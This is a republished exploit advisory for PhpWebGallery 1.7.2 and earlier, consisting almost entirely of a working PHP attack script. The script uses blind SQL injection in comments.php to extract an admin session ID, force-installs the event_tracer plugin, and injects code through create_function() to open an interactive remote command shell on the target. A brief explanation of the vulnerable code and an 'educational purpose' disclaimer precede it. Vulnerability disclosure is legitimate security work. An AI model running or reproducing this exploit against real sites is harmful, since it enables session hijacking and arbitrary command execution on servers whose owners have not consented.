PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit

Advisory Content :

<?php

/*
------------------------------------------------------------------------
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit
------------------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.phpwebgallery.net/
details..: works with at least two rows in _comments table

This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

[-] vulnerable code in /plugins/event_tracer/event_list.php

60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;
61. usort(
62. $events,
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )
64. );

An attacker could be able to inject and execute PHP code through
$_GET['sort'], that is passed
to create_function() at line 63 (see
http://www.securityfocus.com/bid/31398). Only admin can
access to the plugins management interface, but the attacker might be able
to retrieve a valid
admin session id using the SQL injection bug in comments.php (see lines
325-340)
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout",5);

define(STDIN, fopen("php://stdin", "r"));
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");

function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}

function check_target()
{
global $host, $path, $prefix, $default_record;

$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";

preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet,
"foo")), $match);
$prefix = $match[1];

preg_match(PATTERN, http_send($host, sprintf($packet,
"id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];

preg_match(PATTERN, http_send($host, sprintf($packet,
"author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-]
Exploit failed...\n");
}

function encodeSQL($sql)
{
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .=
dechex(ord($sql[$i]));
return "CONCAT(0x{$encoded})";
}

function get_sid()
{
global $host, $path, $prefix, $default_record;

$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z
$index = 1;
$sid = "";

$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";

print "\n[-] Fetching admin SID: ";

while (!strpos($sid, chr(0)))
{
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");

$sql =
"(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM
/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**
/1)/**/LIMIT/**/1/*";

preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print
chr($chars[$i]); break; }
}

$index++;
}

print "\n";
return $sid;
}

function check_plugin()
{
global $host, $path, $sid;

$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";

// check if the event_tracer plugin isn't installed
if (preg_match("/not active/", http_send($host, sprintf($packet,
"admin.php?page=plugin§ion=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet,
"admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet,
"admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}

print
"\n+-----------------------------------------------------------------------
----+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution
Exploit by EgiX |";
print
"\n+-----------------------------------------------------------------------
----+\n";

if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}

$host = $argv[1];
$path = $argv[2];

check_target();

$sid = (isset($argv[3])) ? $argv[3] : get_sid();

check_plugin();

$code =
"0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP
_CMD]));die;%%23";
$packet = "GET
{$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$cod
e} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_",
$response)) : die("\n[-] Exploit failed...\n");
}
else break;
}

?>

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit